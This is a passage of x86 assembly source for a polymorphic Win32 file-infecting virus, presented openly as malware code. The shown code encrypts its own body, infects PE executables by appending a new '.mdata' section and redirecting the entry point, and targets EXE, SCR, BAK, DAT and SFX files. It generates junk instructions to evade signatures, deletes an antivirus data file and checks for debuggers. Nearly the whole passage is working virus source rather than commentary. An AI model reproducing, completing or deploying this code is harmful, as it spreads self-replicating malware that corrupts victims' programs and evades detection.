encrypted] crypt: xor [esi], eax ;encrypt virus body add esi, 4 inc ecx cmp ecx, (virus_end-encrypted+3)/4 jne crypt pop edi pop eax lea esi, [ebx + buffer] mov ecx, edx inc dword ptr [ebx + GenerationCount] ;increment generation count rep movsd ;copy virus mov [ebx + Entrypoint], eax ;restore variable after mov al, 3 ;copy stage jmp if_n err_InfectFile: mov al, 4 mov [ebx + nclosefile_mode], al ;dendrit if_n: mov [ebx + nClF_synapse], offset pfNeuron_InfectFile ;synapse push [ebx + pfNeuron_CloseFile] call [ebx + ddSwitchToFiber] ;switch to neuron end_InfectFile: push [ebx + WFD.WFD_dwFileAttributes] lea esi, [ebx + WFD.WFD_szFileName] push esi call [ebx + ddSetFileAttributesA] ;set back file attributes end_IF: push [ebx + dwThreadID] nIF_synapse = dword ptr $ - 4 call [ebx + ddSwitchToFiber] ;jump to previous neuron jmp n_infectfile NextWayOfInfection: ;create new section mov edi, edx inc word ptr [edi.NT_FileHeader.FH_NumberOfSections] mov eax, [esi.SH_VirtualAddress - x] add eax, [esi.SH_VirtualSize - x] mov ecx, [edi.NT_OptionalHeader.OH_SectionAlignment] cdq div ecx test edx, edx je next_1 inc eax next_1: mul ecx mov [ebx + s_RVA], eax ;new RVA mov ecx, [ebx + Entrypoint] push ecx push [edi.NT_OptionalHeader.OH_AddressOfEntryPoint] pop [ebx + Entrypoint] mov [edi.NT_OptionalHeader.OH_AddressOfEntryPoint], eax ;new EP mov ecx, [edi.NT_OptionalHeader.OH_FileAlignment] mov eax, virtual_end - Start div ecx inc eax mul ecx mov [ebx + s_RAWSize], eax ;new SizeOfRawData add [edi.NT_OptionalHeader.OH_SizeOfImage], eax ;new SizeOfImageBase mov ecx, [ebx + WFD.WFD_nFileSizeLow] mov [ebx + s_RAWPtr], ecx ;new PointerToRawData push ecx mov edi, esi lea esi, [ebx + new_section] mov ecx, (IMAGE_SIZEOF_SECTION_HEADER+3)/4 rep movsd ;copy section pop ecx pop eax jmp copy_virus ;and copy virus body ni_seh: @SEH_RemoveFrame ;remove SEH frame popad jmp end_IF Neuron_InfectFile EndP ;------------------------------------------------------------------------------- one_byte: lea esi, [ebx + junx1] in al, 40h and al, num_junx1-1 add esi, eax movsb ret two_byte: lea esi, [ebx + junx2] in al, 40h and al, num_junx2-1 add esi, eax movsb in al, 40h and al, 7 add al, 11000000b stosb ret get_reg: in al, 40h and al, 7 je get_reg cmp al, 4 je get_reg ret mask_it: mov al, [edi] and al, 11111000b add al, dl stosb ret ;------------------------------------------------------------------------------- Neuron_Addresses: dd offset Neuron_Main dd offset Neuron_Debugger dd offset Neuron_FindFile dd offset Neuron_CheckFile dd offset Neuron_OpenFile dd offset Neuron_CloseFile dd offset Neuron_InfectFile num_of_neurons = (byte ptr $ - offset Neuron_Addresses) / 4 junx1: nop dec eax cmc inc eax clc cwde stc lahf num_junx1 = 8 junx2: db 8bh ;mov ..., ... db 03h ;add ..., ... db 13h ;adc ..., ... db 2dh ;sub ..., ... db 1bh ;sbb ..., ... db 0bh ;or ..., ... db 33h ;xor ..., ... db 23h ;and ..., ... db 33h ;test ..., ... num_junx2 = 9 junx3: db 0c1h, 0c0h ;rol eax, ... db 0c1h, 0e0h ;shl eax, ... db 0c1h, 0c8h ;ror eax, ... db 0c1h, 0e8h ;shr eax, ... db 0c1h, 0d0h ;rcl eax, ... db 0c1h, 0f8h ;sar eax, ... db 0c1h, 0d8h ;rcr eax, ... num_junx3 = 7 junx: irp Num, <1,2,3,4,5,6,7,8,9> dd offset @j&Num endm dd 0 GenerationCount dd ? Entrypoint dd offset ExitProcess - 400000h szExe db '*.EXE', 0 szScr db '*.SCR', 0 szBak db '*.BAK', 0 szDat db '*.DAT', 0 szSfx db '*.SFX', 0 num_of_exts = 5 dotdot db '..', 0 dtavTBAV db 'anti-vir.dat', 0 string_subs: ;string substitutes db 'File', 0 db 'Get', 0 db 'Set', 0 db 'Module', 0 db 'Handle', 0 db 'Create', 0 db 'Find', 0 db 'Close', 0 db 'ViewOf', 0 db 'CurrentDirectoryA', 0 db 'Fiber', 0 db 'Thread', 0 db 'Delete', 0 db 'Library', 0 new_section: s_name db '.mdata', 0, 0 s_vsize dd virtual_end - Start s_RVA dd 0 s_RAWSize dd 0 s_RAWPtr dd 0 dd 0, 0, 0 s_flags dd 0e0000000h virus_end: strings: szKernel32 db 'KERNEL32', 0 szKernel32W dw 'K','E','R','N','E','L','3','2', 0 szUser32 db 'USER32', 0 szGetModuleHandleA db 'GetModuleHandleA', 0 szGetModuleHandleW db 'GetModuleHandleW', 0 szAPIs: szCreateThread db 'CreateThread', 0 szWaitForSingleObject db 'WaitForSingleObject', 0 szCloseHandle db 'CloseHandle', 0 szConvertThreadToFiber db 'ConvertThreadToFiber', 0 szCreateFiber db 'CreateFiber', 0 szSwitchToFiber db 'SwitchToFiber', 0 szDeleteFiber db 'DeleteFiber', 0 szGetVersion db 'GetVersion', 0 szFindFirstFileA db 'FindFirstFileA', 0 szFindNextFileA db 'FindNextFileA', 0 szFindClose db 'FindClose', 0 szCreateFileA db 'CreateFileA', 0 szCreateFileMappingA db 'CreateFileMappingA', 0 szMapViewOfFile db 'MapViewOfFile', 0 szUnmapViewOfFile db 'UnmapViewOfFile', 0 szSetFileAttributesA db 'SetFileAttributesA', 0 szSetFilePointer db 'SetFilePointer', 0 szSetEndOfFile db 'SetEndOfFile', 0 szSetFileTime db 'SetFileTime', 0 szGetCurrentDirectoryA db 'GetCurrentDirectoryA', 0 szSetCurrentDirectoryA db 'SetCurrentDirectoryA', 0 szDeleteFileA db 'DeleteFileA', 0 szLoadLibraryA db 'LoadLibraryA', 0 szFreeLibraryA db 'FreeLibrary', 0 szIsDebuggerPresent db 'IsDebuggerPresent', 0 db 0ffh ddAPIs: ddCreateThread dd ? ddWaitForSingleObject dd ? ddCloseHandle dd ? ddConvertThreadToFiber dd ? ddCreateFiber dd ? ddSwitchToFiber dd ? ddDeleteFiber dd ? ddGetVersion dd ? ddFindFirstFileA dd ? ddFindNextFileA dd ? ddFindClose dd ? ddCreateFileA dd ? ddCreateFileMappingA dd ? ddMapViewOfFile dd ? ddUnmapViewOfFile dd ? ddSetFileAttributesA dd ? ddSetFilePointer dd ? ddSetEndOfFile dd ? ddSetFileTime dd ? ddGetCurrentDirectoryA dd ? ddSetCurrentDirectoryA dd ? ddDeleteFileA dd ? ddLoadLibraryA dd ? ddFreeLibraryA dd ? ddIsDebuggerPresent dd ? dwThreadID dd ? Fiber_Addresses: pfMain dd ? pfNeuron_Main dd ? pfNeuron_Debugger dd ? pfNeuron_FindFile dd ? pfNeuron_CheckFile dd ? pfNeuron_OpenFile dd ? pfNeuron_CloseFile dd ? pfNeuron_InfectFile dd ? hFile dd ? hMapFile dd ? lpFile dd ? SearchHandle dd ? CurDir db MAX_PATH dup (?) WFD WIN32_FIND_DATA ? buffer db virus_end - Start + 1 dup (?) virtual_end: _GetModuleHandleA dd offset GetModuleHandleA _GetModuleHandleW dd offset GetModuleHandleW ends End Start